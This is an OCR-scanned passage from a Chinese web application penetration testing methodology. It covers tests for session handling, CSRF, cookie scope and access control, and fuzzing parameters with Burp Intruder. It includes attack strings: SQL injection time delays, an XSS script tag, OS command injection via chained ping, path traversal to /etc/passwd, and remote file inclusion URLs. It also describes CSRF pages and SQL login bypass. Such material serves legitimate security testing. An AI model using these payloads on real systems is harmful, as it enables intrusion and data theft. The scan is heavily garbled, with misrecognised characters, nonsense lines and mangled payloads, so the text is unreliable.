某 个 特权 功能 ) 。 


21.5.6 ”测试 令 牌 -会 话 映射 
(1) 用 同一 个 用 户 账户 从 不 同 的 浏览 器 进程 或 从 不 同 的 计算 机 两 
次 登录 应 用 程序 。 确 定 这 两 个 会 话 是 否 都 处 于 活动 状态 。 是 就 表示 应 


用 程序 文 持 并 行 会 话 ， 可 让 攻破 其 他 用 户 证 书 的 攻击 者 能 够 利用 这 些 
证 书 ， 而 不 会 有 被 检测 出 来 的 风险 。 


(2) 使 用 同一 个 用 户 账户 从 不 同 的 浏览 器 进程 或 从 不 同 的 计算 机 
登录 并 退出 应 用 程序 儿 次 。 确 定 应 用 程序 在 每 次 登录 时 十 发 布 一 个 新 
会 话 令 牌 ， 还 是 发 布 相同 的 令 牌 。 如 采 每 次 发 布 相同 的 令 牌 ， 那 么 应 
用 程序 根本 没有 正确 使 用 令 牌 ， 而 是 使 用 唯一 持久 性 字符 串 重 新 确认 
用 户 映 份 。 在 这 种 情况 下 ， 应 用 程序 就 没有 办 法 防止 并 行 登 录 或 正确 
实施 会 话 超时 。 

(3) 如 果 令 牌 明显 包含 某 种 结构 和 意义 ， 设 法 将 标识 用 户 身 份 的 
成 分 与 无 法 辨别 的 成 分 区 分 开 来 。 壬 试 修改 与 用 户 有 关 的 所 有 令 牌 成 
分 ， 使 其 指 癌 其 他 已 知 的 应 用 程序 用 户 ， 并 确定 修改 后 的 令 牌 是 否 被 
应 用 程序 接受 ， 以 及 能 够 让 攻击 者 伪 效 成 该 用 户 。 请 参阅 第 7 章 了 解 这 
种 细微 漏洞 的 示例 。 


21.5.7 ”测试 会 话 终止 


(1) 当 测 试 会 话 超时 与 退出 漏洞 时 ， 主 要 测试 服务 器 如 何 处 理会 
话 与 令 牌 ， 而 不 是 客户 端 发 生 的 任何 事件 。 在 客户 端 浏览 吉 内 对 令 牌 
执行 的 操作 并 不 能 终止 会 话 。 

(2) 检查 服务 器 是 否 执行 会 话 终 止 。 

口 登录 应 用 程序 获得 一 个 有 效 令 脾 。 

口 不 使 用 这 个 令 牌 ， 等 待 一 段 时 间 后 ， 用 这 个 令 牌 提交 一 个 

访问 受 保护 页 面 (如 “我 的 资料 ”页 面 ) 的 请 求 。 

口 如 果 该 页 面 正常 显示 ， 那 么 令 有 牌 仍然 处 于 活动 状态 。 

口 使 用 反复 试验 的 方法 确定 会 话 终止 超时 时 间 为 多 久 ， 或 者 
一 个 令 牌 在 前 一 次 使 用 它 提 交 请 求 儿 天 后 是 否 仍 被 使 用 。 可 配置 
Burp Intruder 递 增 连 续 请 求 之 间 的 时 间 间 隔 ， 目 动 完成 这 项 任务 。 
(3) 检查 退出 功能 是 否 存在 。 如 果 应 用 程序 使 用 退出 功能 ， 测 试 

它 是 否 能 够 在 服务 器 上 上 有效 确认 用 户 的 会 话 。 退 出 后 ， 壬 试 重新 使 用 

原 有 的 令 牌 ， 使 用 它 请 求 一 个 受 保护 的 页 面 ， 确 定 其 是 否 仍然 有 效 。 

如 果 令 牌 仍然 有 效 ， 那 么 即使 用 户 已 经 * 退 出 >， 他 们 依然 易于 受到 会 

话 动 持 攻 击 。 可 以 使 用 Burp Repeater 从 代理 历史 记录 中 不 断 发 送 一 个 

特殊 的 请 求 ， 观 穴 退 出 后 应 用 程序 是 否 做 出 不 同 的 啊 应 。 


21.5.8 ”测试 会 话 固定 


(1) 如 果 应 用 程序 向 未 通过 验证 的 用 户 发 布 令 牌 ， 获 取 令 牌 并 登 
录 。 如 果 应 用 程序 在 登录 后 并 不 发 布 一 个 新 令 牌 ， 就 表示 它 易于 受到 


会 话 固定 攻击 。 

(2) 即使 应 用 程序 并 不 向 未 通过 验证 的 用 户 发 布 会 话 令 牌 ， 也 可 
通过 登录 获得 一 个 令 牌 ,然后 返回 登录 页 面 。 如 果 应 用 程序 “愿意 ” 返 
回 这 个 页 面 ， 即 使 已 经 通过 验证 ， 也 可 使 用 相同 的 令 牌 以 另 一 名 用 户 
的 映 份 提交 男 一 次 登录 。 如 有 果 应 用 程序 在 第 二 次 登录 后 并 不 发 布 一 个 
新 令 牌 就 表示 它 易 于 受到 会 话 固 定 攻 击 。 

(3) 确定 应 用 程序 会 话 令 牌 的 格式 。 用 一 个 捏造 的 、 格 式 有 效 的 
值 修改 令 牌 ,然后 竹 试 使 用 它 登 录 。 如 果 应 用 程序 允许 使 用 一 个 捏造 
的 令 牌 建立 通过 验证 的 会 话 ， 束 表示 它 易于 受到 会 话 固定 攻击 。 

(4) 如 果 应 用 程序 并 不 支持 登录 功能 ， 但 处 理 敏 感 数据 (如 个 人 
信息 和 文 付 细节 ) ， 并 在 提交 后 显示 这 些 信息 (如 在 “确认 订单 "页面 
上 ) ， 那 么 可 以 使 用 前 面 的 三 种 测试 方法 尝试 访问 显示 敏感 数据 的 页 
面 。 如 有 果 在 匿名 使 用 应 用 程序 期 间 生成 的 令 牌 可 用 于 获取 用 户 的 敏感 
言 息 ， 那 么 应 用 程序 就 易于 遭受 会 话 国定 攻击 。 


21.5.9 ”检查 CSRF 


(1) 如 果 应 用 程序 完全 依靠 HTTP cookie 传 送 会 话 令 牌 ， 它 很 可 
能 容易 受到 跨 站 点 请 求 伪造 (CSRF) 攻击 。 

(2) 分 析 应 用 程序 的 关键 功能 ， 确 定 用 于 执行 敏感 操作 的 特定 请 
求 。 如 果 这 些 请 求 中 的 参数 完全 可 由 攻击 者 事先 决定 (也 就 是 说 ， 其 
中 并 不 包含 任何 会 话 令 牌 、 无 法 预测 的 数据 或 其 他 机 密 ) ， 那 么 几乎 
可 以 肯定 应 用 程序 易于 受到 攻击 。 

(3) 创建 一 个 HTML 页 面 ， 它 不 需要 进行 任何 用 户 交 互 ， 即 可 提 
出 想 要 的 请 求 。 对 于 GET 请 求 ， 可 以 使 用 一 个 <img> 标 签 ， 并 通过 src 
参数 设置 易 受 攻击 的 URL。 对 于 POST 请 求 ， 可 以 建立 一 个 表单 ， 其 中 
包含 实施 攻击 所 需 全 部 相关 参数 的 隐藏 字段 ， 并 将 其 目标 设 为 易 受 攻 
击 的 URL。 可 以 使 用 JavaScript 在 页 面 加 载 时 自动 提交 该 表单 。 登 录 应 
用 程序 后 ， 使 用 同一 个 浏览 器 加 载 前 面 创 建 的 HTML 页 面 。 确 认 应 用 
程序 是 否 执行 想 要 的 操作 。 

(4) 如 果 应 用 程序 为 阻止 CSRF 攻 击 ， 在 请 求 中 使 用 其 他 令 牌 ， 
则 应 以 与 测试 会 话 令 牌 相同 的 方式 测试 这 些 令 牌 的 可 靠 性 。 还 应 测试 
应 用 程序 是 否 易于 受到 UI 伪装 攻击 ， 以 突破 反 CSRF 防 御 (请 参阅 第 13 
章 了 解 相关 详情 ) 。 


21.5.10 “检查 cookie 范 


(1) 如 果 应 用 程序 使 用 HTTP cookie 传 送 会 话 令 牌 (或 任何 其 他 
敏感 数据 ) ， 那 么 检查 相关 的 SetrCookie 消 息 头 ， 寻 找 用 于 控制 cookie 
范围 的 所 有 “ 域 " 或 “路 径 ” 属 性 。 

(2) 如 果 一 个 应 用 程序 明确 放宽 它 的 cookie 范 围 限制 ， 将 其 设 定 
为 一 个 父 域 或 父 目录 ， 那 么 攻击 者 可 以 通过 以 上 父 域 或 父 目 录 中 的 其 
他 Web 应 用 程序 向 该 应 用 程序 发 动 攻击 。 

(3) 如 果 一 个 应 用 程序 以 它 自己 的 域名 为 它 的 cookie 域 范围 (或 
并 未 指定 “ 域 " 属 性) ， 那 么 它 仍 然 可 能 受到 在 子 域 上 运行 的 应 用 程序 
的 威胁 。 这 是 设 定 cookie 范 围 造成 的 后 果 ， 只 有 不 在 安全 敏感 的 应 用 
程序 的 子 域 上 运行 其 他 应 用 程序 ， 才 能 避免 这 种 后 果 。 

(4) 确定 对 按 路 径 (如 /site/main 和 /site/demo) 隔离 的 任何 依赖 
情况 ， 跨 站 点 脚本 攻击 能 够 破坏 这 种 隔离 。 

(5) 确定 所 有 可 能 收 到 应 用 程序 发 布 的 cookie 的 域名 和 路 径 。 确 
是 否 可 通过 这 些 域名 或 路 径 访问 其 他 Web 应 用 程序 ， 以 及 是 否 可 利 
它们 获得 发 布 给 目标 应 用 程序 用 户 的 cookie 。 


定 
用 


图 21-7 ”测试 访问 控制 
21.6.1 THWR > 


(1) 根据 应 用 程序 的 核心 功能 ， 了 解 访问 控制 在 垂直 隔离 (拥有 
不 同 权限 的 用 户 可 访问 不 同类 型 的 功能 ) 与 水 平 隔离 (拥有 相同 权限 
的 用 户 可 访问 不 同 的 数据 ) 方面 的 主要 要 求 ， 通 常 ， 应 用 程序 会 使 用 
两 种 权限 隔离 ， 例 如 ， 普 通用 户 能 够 访问 目 己 的 数据 ， 而 管理 员 则 能 
够 访问 每 个 人 的 数据 。 

(2) 检查 应 用 程序 解析 过 程 得 到 的 结果 ， 确 定 最 可 能 成 为 权限 提 
升 攻击 目标 的 功能 区 域 与 数据 资源 类 型 。 

(3) 为 提高 测试 访问 控制 漏洞 的 效率 ， 渗 透 测试 员 应 该 获得 大 量 
拥有 不 同 垂直 权限 与 水 平权 限 的 账户 。 如 果 应 用 程序 允许 目 我 注册 ， 
渗透 测试 员 束 可 以 直接 获得 大 量 拥有 不 同 水 平权 限 的 账户 。 为 获得 拥 
有 不 同 垂直 权限 的 账户 ， 需 要 得 到 应 用 程序 所 有 者 的 帮助 《或 利用 某 
个 漏洞 访问 一 个 高 权限 账户 ) 。 如 后 文 所 述 ， 能 和 否 获得 各 种 不 同 的 账 
户 将 会 对 能 够 进行 的 测试 产生 直接 影响 。 


21.6.2 ”使 用 多 个 账户 测试 
(1) 如 果 应 用 程序 实施 垂直 权限 隅 离 ， 那 么 首先 使 用 一 个 高 权限 


账户 确定 它 能 访问 的 所 有 功能 ， 然 后 再 使 用 一 个 低 权 限 账户 等 试 访问 
上 述 每 一 项 功能 。 


E (a) 使 用 Burp 在 一 个 用 户 的 权限 下 浏览 应 用 程序 的 所 有 内 
(b) 复查 Burp 的 站 点 地 图 内 容 ， 确 保 已 确定 要 测试 的 所 有 功 

能 。 然 后 ， 注 销 应 用 程序 并 使 用 另 一 个 用 户 账 户 登 录 ; 使 用 上 下 

MCSE A EPEC SHA” (compare site maps) 功能 ， 人 确定 较 低 

权限 的 用 户 可 以 访问 哪些 高 权限 请 求 。 请 参阅 第 8 章 了 解 这 种 技巧 

的 更 多 详情 。 

(2) 如 果 应 用 程序 实施 水 平权 限 隔离 ， 那 么 使 用 两 个 拥有 相同 权 
限 的 不 同 账户 进行 同等 测试 ， 莹 试 使 用 一 个 账户 访问 属于 另 一 个 账户 
的 数据 。 通 常 ， 这 需要 替换 请 求 中 的 一 个 标识 符 (如 一 个 文档 ID) ， 
以 指定 属于 其 他 用 户 的 资源 。 

(3) 手动 检查 关键 访问 控制 逻辑 。 

对 于 每 个 用 户 权 限 ， 复 查 用 户 可 用 的 资源 。 尝 试 通过 使 用 未 授权 
用 户 的 会 话 令 和 脾 ， 从 末 授 权 用 户 账户 重新 提交 请 求 来 访问 这 些 资 源 。 

(4) 进行 访问 控制 测试 时 ， 一 定 要 分 别 测试 多 阶段 功能 的 每 一 个 
步骤 ， 确 定 每 一 个 阶段 是 否 正确 实施 了 访问 控制 ; 或 者 应 用 程序 是 否 
认为 访问 后 一 个 阶段 的 用 户 一 定 通过 了 前 面 阶段 实施 的 安全 检查 。 例 
如 ， 如 果 一 个 包含 表单 的 管理 页 面 受 到 恰当 保护 ， 检 查 提 交 表 单 的 过 
程 中 是 否 同 样 实施 了 合理 的 访问 控制 。 


21.6.3 ”使 用 有 限 的 权限 测试 


(1) 如 果 不 能 优先 访问 不 同 权 限 的 账户 ， 或 者 优先 访问 几 个 能 够 
访问 不 同 数据 的 帐户， 那么 测试 不 完善 的 访问 控制 机 制 可 能 相当 困 
难 。 由 于 并 不 知道 利用 各 种 缺陷 所 需 的 URL 名 称 、 标 识 竺 和 参数 ， 因 
此 许多 第 见 的 漏洞 将 更 加 难以 确定 。 

(2) 在 使 用 低 权 限 账户 解析 应 用 程序 的 过 程 中 ， 渗 透 测 试 员 可 能 
已 经 确定 了 访问 管理 接口 等 特权 功能 的 URL。 如果 这 些 功能 没有 得 到 
充分 保护 ， 渗 透 测试 员 可 能 已 经 了 解 了 这 一 点 。 

(3) 反 编 译 现 有 的 所 有 已 编译 客户 端 ， 并 提取 对 服务 器 端 功 能 的 
任何 引用 情况 。 

(4) 大 多 数 受 到 水 平 访问 控制 保护 的 数据 可 使 用 一 个 标识 符 (如 
一 个 账号 或 订单 号 ) 访问 。 为 了 使 用 一 个 账户 测试 访问 控制 是 否 有 
效 ， 需 要 笑 试 、 猜 测 或 发 现 与 其 他 用 户 的 数据 有 关 的 标识 符 。 如 有 可 
能 ， 生 成 一 系列 紧密 相连 的 标识 符 例如， 通过 建立 儿 个 新 订单 ) ， 
壬 试 确定 所 有 可 帮助 预测 发 布 给 其 他 用 户 的 标识 符 的 模式 。 如 果 无 法 


生成 新 的 标识 符 ， 就 只 能 分 析 已 经 确定 的 标识 符 ， 并 根据 这 些 标识 符 
猜测 其 他 标识 符 。 

(5) 如 果 能 够 预测 出 发 布 给 其 他 用 户 的 标识 符 ， 使 用 第 14 章 描述 
的 技巧 实施 目 动 攻击 ， 获 取 属 于 其 他 用 户 的 有 用 数据 。 可 使 用 Burp 
Intruder 的 Extract Grep 功 能 从 应 用 程序 的 响应 中 截获 相关 信息 。 


21.6.4 ”测试 不 安全 的 访问 控制 方法 


(1) 一 些 应 用 程序 根据 请 求 参 数 以 一 种 内 在 不 安全 的 方式 实施 访 
问 控 制 。 在 所 有 关键 请 求 中 寻找 edit=false 或 access=read 之 类 的 参数 ， 
on AEB VE (BROKE BR, SRA Ree ae 
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(2) 一 些 应 用 程序 根据 HTTP Referer 消 息 头 做 出 访问 控制 决策 。 
例如 ， 一 个 应 用 程序 可 能 对 /admin.jsp 实 施 严 格 的 访问 控制 ， 并 接受 在 
Referer 中 显示 它 的 所 有 请 求 。 为 测试 这 种 行为 ， 尝 斌 执行 一 些 获得 授 
权 的 特权 操作 ， 并 提交 一 个 其 中 缺少 Referer 消 息 头 或 Referer 消 息 头 被 
修改 的 请 求 。 如 果 这 种 改变 导致 应 用 程序 阻止 请 求 ， 应 用 程序 很 可 能 
以 不 安全 的 方式 使 用 Referer 消 恩 涉 。 尝 试 使 用 一 个 未 通过 验证 的 用 户 
账户 执行 相同 的 操作 ， 但 提交 原始 的 Referer 消 息 头 ， 看 这 时 是 否 能 够 
成 功 执行 操作 。 

(3) 如 果 站 点 允许 HEAD 方 法 ， 则 应 测试 针对 URL 的 不 安全 的 容 
oad 问 控 制 。 使 用 HEAD 方 法 提出 请 求 ， 确 定 应 用 程序 是 否 允 许 
AJA ° 


许多 重要 的 漏洞 由 无 法 预测 的 用 户 输 入 触发 ， 并 可 能 出 现在 应 用 
程序 的 任何 位 置 。 用 一 组 攻击 字符 串 模 糊 测试 每 个 请 求 的 每 一 个 参 
数 ， 是 在 应 用 程序 中 探查 这 种 漏洞 的 有 效 方法 。 


21.7.1 模糊 测试 所 有 请 求人 参数 


21.72 SQL 7-3 XSS a ee 21.7.5 路 径 ee ae 文件 
注入 与 响应 注 遍历 


图 21-8 ”测试 基于 输入 的 漏 } 


21.7.1 测试 月 


(1) 检查 应 用 程序 解析 过 程 中 获得 的 结果 ， 确 定 所 有 提交 由 服务 
需 端 应 用 程序 处 理 的 参数 的 特殊 客户 端 请 求 。 相 关 参 数 分 别 位 于 URL 
查询 字符 串 、 请 求 主体 及 HTTP cookie 中 。 它 们 还 包括 所 有 给 应 用 程序 
行为 造成 影响 的 用 户 提交 的 数据 ， 如 Referer 或 User-Agent 消 息 头 。 

(2) 要 对 这 些 参数 进行 模糊 测试 ， 可 以 使 用 自己 的 脚本 ， 或 者 现 
成 的 模糊 测试 工具 。 人 例如， 如果 使 用 Burp Intruder， 可 轮流 在 工具 中 加 
载 每 一 个 请 求 。 一 个 人 简单 的 方法 是 在 Burp Proxy 中 拦截 一 个 请 求 ， 然 
后 选择 “发 送 至 Intruder” 操 作 ;， 或 者 在 Burp Proxy 历 史记 录 中 单 击 一 个 
请 求 ， 再 选择 这 个 选项 。 使 用 这 个 选项 将 在 Burp Intruder 中 配置 请 求 的 
内 容 、 正 确 的 目标 主机 和 端口 ， 然 后 Burp Intruder 目 动 将 所 有 请 求 参数 
的 值 标 记 为 有 效 载荷 位 置 ， 准 备 进 行 模糊 测试 。 

(3) 使 用 “有 效 载 集 "选项 卡 ， 配 置 一 组 适当 的 攻击 有 效 载 集 ， 在 
应 用 程序 中 探查 漏洞。 可 以 手动 输入 有 效 载 集 ， 从 一 个 文件 中 加 载 它 
们 ， 或 者 选择 一 个 预先 设 定 的 有 效 载 集 列表 。 模 糊 测 试 应 用 程序 中 的 
第 一 个 请 求 参 数 往往 需要 发 布 数目 庞大 的 请 求 ， 并 在 结果 中 查找 反 第 
现象 。 如 有 果 设 定 的 攻击 字符 串 过 多 ， 这 样 反 而 达 不 到 预期 的 目标 ， 甚 


至 生成 无 数 的 输入 ， 以 致 很 难 对 其 进行 分 析 。 因 此 ， 较 为 明智 的 做 法 
是 ,测试 一 系列 可 在 特定 的 专门 设计 的 输入 的 反常 响应 中 轻易 确定 的 
常见 漏洞 ， 以 及 出 现在 应 用 程序 的 所 有 位 置 而 非 某 些 特殊 功能 中 的 漏 
洞 。 可 以 使 用 以 下 一 组 有 效 载 和 谷 测 试 一 些 常见 的 漏洞 。 

@ SQL 注入 


r 


'; waitfor delay '0:30:0'-- 
1; waitfor delay '0:30:0'-- 


e XSS 与 消息 头 注 入 


xsstest 
"><script>alert('xss')</script> 


@ OS 命令 注入 


|| ping -i 30 127.0.0.1 ; x || ping -n 30 127.0.0.1 & 
| 


ping -i 30 127.0.0.1 | 
| ping -n 30 127.0.0.1 | 
& ping -i 30 127.0.0.1 & 
& ping -n 30 127.0.0.1 & 


>» ping 127.0.0.1 
%0a ping -i 30 127. 0.0.1 %0a 
~ ping i27.0:0-1 


@ KILEN 


.. ¿etc/passwd 
./boot.ini 
. \etc\passwd 
..\boot.ini 


. . . . 
. . . * 
oe. a Se) Tag 
. . . . 


/ 
et sx 
\ 

\ 


. . . 
. . . 
ae ee a 
. . . . 
。 . . 
Eh 
. . . . 


ee oe! Sey oe 
. . . 

. . . . 

ey 
JE pee ay Ss 
ae ee hee 
= Se eae oe 


@ 脚本 注入 


;echo 111111 
echo 111111 
response.write 111111 
:response.write 111111 


@ 文件 包 侣 


http://<your server name>/ 
http://<nonexistent IP address>/ 


(4) BIA ey SF Ie R, P35. & s+ 
格 与 = 字符 因为 在 HTTP 请 求 中 有 特殊 合 义 ， 需 要 进行 URL 编 码 。 默 认 
情况 下 ，Burp Intruder 会 对 这 些 字 符 进 行 必 要 的 编码 ， 因 此 ， 必 须 确保 
该 选项 没有 被 禁用 。 《如 果 想 要 在 定制 后 将 所 有 选项 恢复 到 它们 的 默 
认 值 ， 可 从 Burp 菜 单 中 选择 “恢复 默认 值 ? 选 项 。) 

(5) 在 Burp Intruder 的 Grep 功 能 中 ， 配 置 一 组 合适 的 字符 串 ， 标 
记 响 应 中 的 一 些 和 常见 的 错误 消 轧 。 例 如 : 


error 


exception 
illegal 
invalid 
fail 
stack 
access 
directory 
file 

not found 
varchar 
ODBC 

SQL 
SELECT 

vB Bs Bef | 


请 注意 ， 其 中 的 字符 串 111111 用 于 测试 成 功 的 脚本 注入 攻击 ; 
21.7.1 闻 第 3 步 中 的 有 效 载 倚 要 求 将 这 个 值 写 入 服务 夯 的 响应 中 。 


(6) 同时 ， 选 择 “ 有 效 载 傈 Grep” 选 项 ， 标 记 包 含有 效 载 倚 自 身 的 
响应 ， 该 啊 应 表示 可 能 存在 XSS 或 消息 尖 注 入 漏洞 。 

(7) 在 通过 第 一 个 文件 包含 有 效 载 集 指 定 的 主机 上 建立 一 个 Web 
as ， 监 控 服 务 器 由 于 远程 文件 包含 攻击 而 发 出 的 连 
ZEN 

(8) XWF, HAR PAR EY S e 
应 。 检 查 HTTP 状 态 码 、 啊 应 长 度 、 响 应 时 间 、 其 中 是 否 出 现 配 置 的 表 
达 式 以 及 是 否 出 现 有 效 载 傈 本 号 。 可 以 单 击 结 果 表 的 每 一 个 列 标题 ， 
对 列 中 的 值 进行 分 类 ( 按 下 Shift 键 的 同时 单 击 鼠 标 可 对 结果 进行 反问 
排序 ) ， 这 样 做 可 迅速 确定 所 有 不 同 于 其 他 结果 的 反常 啊 应 。 

(9) 参考 本 章 后 文 对 每 一 类 问题 的 详细 描述 ， 对 模糊 测试 结果 表 
明 可 能 存在 的 每 一 个 潜在 的 漏洞 进行 确认 ， 同 时 考虑 如 何 成 功 地 利用 
这 些 漏 洞 。 

(10) 一 旦 配置 Burp Intruder 对 某 个 请 求 进行 模糊 测试 后 ， 就 可 以 
迅速 地 对 应 用 程序 中 的 其 他 请 求 进行 相同 的 测试 。 在 Burp Proxy 中 选 
定 目标 请 求 ， 再 选择 “发 送 至 Intruder 选 项 ， 束 可 以 立即 使 用 现 有 的 测 
试 选 项 在 Intruder 中 进行 测试 。 这 样 ， 就 可 以 同时 在 单独 的 窗口 中 进行 
大 量 测试 ， 在 测试 完成 后 手动 检查 测试 结果 。 

(11) 如 果 在 解析 应 用 程序 的 过 程 中 确定 了 带 外 输入 通道 ， 可 通 
过 它们 同 应 用 程序 提交 用 户 可 控制 的 输入 。 渗 透 测 试 员 应 当 通 过 提交 
各 种 旨 在 触发 常见 的 web 应 用 程序 漏洞 的 专门 设计 的 数据 ， 对 这 些 输 
入 通道 进行 类 似 的 模糊 漏洞 。 根 据 输入 通道 的 特点 ， 可 能 需要 建立 一 
个 定制 脚本 或 其 他 工具 。 

(12) 除了 手动 对 应 用 程序 请 求 进行 模糊 测试 外 ， 如 有 果 拥 有 一 个 
目 动 化 Web 应 用 程序 漏洞 扫 拉 器， 还 应 当 运 行 该 扫描 器 ， 对 目标 应 用 
程序 进行 目 动 测试 ， 并 比较 两 方面 的 测试 结果 。 


21.7.2 ”测试 SQL 注入 


(1) 如 果 发 现 21.7.1 节 第 3 步 中 列 出 的 SQL 攻击 字符 串 导 致 任何 反 
常 啊 应 ， 那 么 应 该 手动 探查 ， 观 察 应 用 程序 如 何 处 理 相关 参数 ， 确 定 
其 中 是否 人 存在 SQL 注入 漏洞 。 

(2) 如 果 提 交 上 述 字 符 串 返回 错误 消息 ， 分 析 这 些 消 息 的 意义 。 
可 以 根据 9.2.13 克 提供 的 信息 了 解 错误 消息 在 常用 数据 库 平 台中 的 含 
Ve 


(3) 如 采 在 请 求 中 提交 一 个 单 引号 导致 错误 或 出 现 其 他 反 篆 行 
为 ， 可 笑 试 提交 两 个 单 引 号 ， 如 采 这 种 输入 使 错误 或 异 第 行为 消失 ， 
应 用 程序 可 能 易于 受到 SQL 注入 。 

(4) 设法 使 用 常用 的 SQL 字符 串 连 接 符 函数 构建 一 个 等 同 于 民 性 
输入 的 字符 串 。 如 果 提 交 这 个 字符 串 得 到 与 提交 原始 的 民 性 输入 相同 
的 啊 应 ， 那 么 应 用 程序 可 能 易于 受到 攻击 。 例 如 ， 如 有 果 原 始 输入 为 表 
达 式 FOO， 可 以 使 用 下 面 的 输入 测试 : 


'| | "Foo 
ges 


'FOO (注意 ， 引 号 之 间 有 空格 ) 


同样 ， 应 对 在 HTTP 请 求 中 具有 特殊 意义 的 字符 (如 + 和 空格 ) 进 
行 URL 编 码 。 

(5) 如 果 原 始 输入 为 数字 字符 ， 党 试 使 用 一 个 其 结果 等 于 原始 值 
的 数学 表达 式 。 例 如 ， 如 果 原 始 值 为 >， 尝试 提交 1+1 或 3-1。 如 果 应 用 
程序 做 出 相同 的 响应， 表示 它 易于 受到 攻击 ;如 果 数 字 表 达 式 的 值 对 
BON aiid epee nla eat 


(6) 如 果 前 面 的 测试 取得 成 功 ， 可 以 通过 使 用 针对 SQL 的 数学 表 
达 式 构造 一 个 特殊 的 值 ， 进 一 步 确定 SQL 注 入 漏洞 是 否 存在 。 如 末 可 
以 通过 这 种 方式 系统 性 地 控制 应 用 程序 的 人 逻辑， 那么 几乎 可 以 肯定 应 
用 程序 易于 受到 SQL 注 入 攻击 。 例 如 ， 下 面 两 个 表达 式 的 结果 都 等 于 
2: 


(7) 如 果 使 用 waitfor 命 令 进行 的 模糊 漏洞 测试 导致 应 用 程序 在 进 
行 响 应 时 出 现 反 名 的 时 间 延 迟 ， 那 么 所 使 用 的 数据 库 为 MS-SQL ， 且 
应 用 程序 易于 受到 SQL 注入 攻击 。 手 动 重复 测试 ， 在 waitfor 参 数 中 指 
定 不 同 的 值 ， 确 定 响 应 时 间 是 否 随 着 这 个 值 而 发 生 系 统 性 的 变化 。 请 
注意 ， 可 以 在 几 个 SQL 查询 中 插入 攻击 有 效 载 和 荷 ， 这 时 观察 到 的 时 间 
延迟 为 指定 值 的 固定 倍数 。 
(8) 如 果 应 用 程序 易于 受到 SQL 注入 攻击 ， 渗 透 测 试 员 要 考虑 可 
以 实施 哪些 攻击 ， 以 及 如 何 利 用 它们 实现 自己 的 目的 。 请 参考 第 9 章 了 
解 实施 以 下 攻击 的 详细 步骤 。 
口 修 改 WHERE 子 句 中 的 条 件 ， 改 变 应 用 程序 的 逻辑 (例如 ， 
注入 or 1=1-- 避 开 登 录 ) ° 


口 使 用 UNION 操 作 符 注入 任意 一 个 SELECT 查询 ， 将 它 的 结 
果 与 应 用 程序 的 原始 查询 的 结果 组 合 在 一 起 。 

口 使 用 针对 数据 库 的 SQL 语法 “指纹 标识 ”数据 库 类 型 。 

口 如 果 使 用 的 数据 库 为 MS-SQL， 且 应 用 程序 在 响应 中 返回 
pe ey Rei ee eee 
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口 如 果 无 法 获得 一 个 任意 输入 的 查询 的 结果 ， 可 以 使 用 以 下 
攻击 技巧 提取 数据 。 

m 获取 数字 格式 的 字符 串 数据 ， 一 次 一 个 字 节 。 
@ 使 用 带 外 通道 。 
m 如 果 能 够 根据 任意 一 个 条 件 引 发 不 同 的 应 用 程序 响 

必 ， 可 使 用 Absinthe 提 取 任 意 数 据 ， 一 次 一 比特 。 

m 如 果 能 够 根据 一 个 任意 的 条 件 触发 时 间 延 迟 ， 利 用 它 

们 获取 数据 ， 一 次 一 比特 。 

口 如 果 应 用 程序 阻止 实施 特殊 攻击 所 需 的 某 些 字符 或 表达 
式 ， 党 试 使 用 第 9 章 描 述 的 各 种 技巧 避 开 输入 过 滤 。 

口 如 有 可 能 ， 利 用 漏洞 或 强大 的 数据 库 函 数 ， 将 攻击 范围 扩 
大 到 数据 库 与 基础 服务 器 中 。 


21.7.3 ”测试 XSS 和 其 他 响应 注入 


1. 确定 反射 型 请 求 参数 

(1) 单 击 “ 有 效 载荷 Grep” 列 ， 分 类 模糊 漏洞 测试 的 结果 ， 确 定 任 
何 与 21.7.1 世 第 3 步 中 列 出 的 XSS 有 效 载 傈 相 匹配 的 字符 串 。 这 些 是 在 
应 用 程序 响应 中 按 原样 返回 的 XSS 测 试 字 符 串 。 

(2) 对 于 上 壕 每 一 个 字符 串 ， 检 查 应 用 程序 的 响应 ， 查 找 用 户 提 
交 的 输入 的 位 置 。 如 果 该 字符 串 出 现在 响应 主体 中 ， 应 测试 应 用 程序 
中 是 否 存 在 XSS 漏 洞 。 如 果 它 出 现在 HTTP 消息 头 中 ， 应 测试 应 用 程序 
中 是 否 存 在 消息 头 注 入 漏洞 。 如 果 它 被 用 在 302 啊 应 的 Location 消 息 头 
中 ， 或 者 用 于 以 某 种 方式 指定 重 定向 ， 应 测试 应 用 程序 中 是 否 存在 重 
定向 漏洞 。 请 注意 ， 同 一 个 输入 可 能 会 被 复制 到 响应 中 的 几 个 位 置 ， 
因此 应 用 程序 中 可 能 存在 几 种 类 型 的 反射 型 漏洞 。 

2. 测试 反射 型 XSS 

(1) 对 于 在 响应 主体 中 出 现 的 所 有 请 求 参 数 ， 检 查 它 周围 的 
HTML 代 码 ， 确 定 是 否 可 以 提交 专门 设计 的 输入 ， 从 而 执行 任意 


JavaScript 脚 本 。 例 如 ， 通 过 注入 <script> 标 签 ， 注 入 一 段 现 有 代码 ， 或 
在 一 个 标签 属性 中 插入 精心 设计 的 值 ， 执 行 任意 JavaScript 脚 本 。 

(2) 将 第 12 章 讲述 的 攻破 签名 过 滤器 的 各 种 方法 作为 参考 ， 了 解 
如 何 利 用 专门 设计 的 输入 执行 任意 JavaScript 脚 本 。 

(3) 莹 试 回应 用 程序 提交 各 种 可 能 的 输入 ， 监 探 它 的 响应 ， 确 定 
应 用 程序 是 否 对 输入 进行 任何 过 滤 或 净化 。 如 果 攻 击 字 符 串 被 原样 返 
回 ， 使 用 浏览 器 确认 成 功 执行 了 任意 JavaScript 脚 本 (例如 ， 通 过 生成 
一 个 警报 对 话 框 ) 。 

(4) 如 果 发 现 应 用 程序 阻止 需要 使 用 的 某 些 字符 串 或 表达 式 ， 或 
人 尝试 使 用 第 12 章 摘 述 的 各 种 技巧 避 开 过 
ils ° 

(5) 如 果 在 一 个 POST 请 求 中 发 现 了 XSS 漏 洞 ， 仍 然 可 以 通过 一 
个 包含 表单 的 恶意 Web 站 点 ， 由 必要 的 请 求 参数 和 一 段 脚 本 目 动 提 区 
该 表单 ， 对 这 个 漏洞 加 以 和 利用。 但是， 如果 可 以 通过 GET 请 求 利 用 漏 
洞 ， 残 可 以 使 用 大 量 的 攻击 传送 机 制 。 答 试 在 GET 请 求 中 提交 相同 的 
参数 ， 看 攻击 是 否 仍然 取得 成 功 。 可 以 使 用 Burp Proxy 的 “改变 请 求 命 
令 ”(Change Request Method) 操作 转换 请 求 类 型 。 

3. 测试 HTTP 消 息 头 注入 

(1) 对 于 在 响应 消息 头 中 出 现 的 每 一 个 请 求 参数 ， 确 认 应 用 程序 
